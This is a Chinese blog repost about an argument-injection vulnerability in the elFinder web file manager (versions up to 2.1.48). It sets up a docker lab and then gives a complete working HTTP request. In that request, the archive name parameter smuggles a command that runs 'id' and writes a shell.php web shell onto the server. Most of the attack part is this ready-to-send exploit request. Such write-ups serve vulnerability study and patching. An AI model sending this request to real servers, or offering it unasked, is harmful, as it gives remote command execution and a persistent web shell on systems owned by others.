本文介绍: elFinder 是一个用于 Web 的开源文件管理器使用 jQuery UI 用 JavaScript 编写。在 elFinder 2.1.48 及更早版本发现一个参数注入漏洞。此漏洞可能允许攻击者在托管 elFinder PHP 连接器服务器执行任意命令,即使配置最少也是如此。这些问题已在版本 2.1.59 中修补。解决方法是,确保连接器不会在未经身份验证的情况下公开。

漏洞描述

elFinder 是一个用于 Web 的开源文件管理器使用 jQuery UI 用 JavaScript 编写

在 elFinder 2.1.48 及更早版本发现一个参数注入漏洞。此漏洞可能允许攻击者在托管 elFinder PHP 连接器的服务器上执行任意命令,即使配置最少也是如此。这些问题已在版本 2.1.59 中修补。解决方法是,确保连接器不会在未经身份验证的情况下公开。

引用

漏洞环境及利用

搭建docker环境

访问8080端口

 

创建1.txt 

右键创建2.zip

然后发送以下请求执行任意命令

GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 

在此请求中,您可以看到 3 个重要参数

尽管此请求响应错误消息,但我们命令执行并已写入shell.phphttp://your-ip:8080/files/shell.php

 

原文地址:https://blog.csdn.net/weixin_56537388/article/details/134660885

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如若转载,请注明出处:http://www.7code.cn/show_8591.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注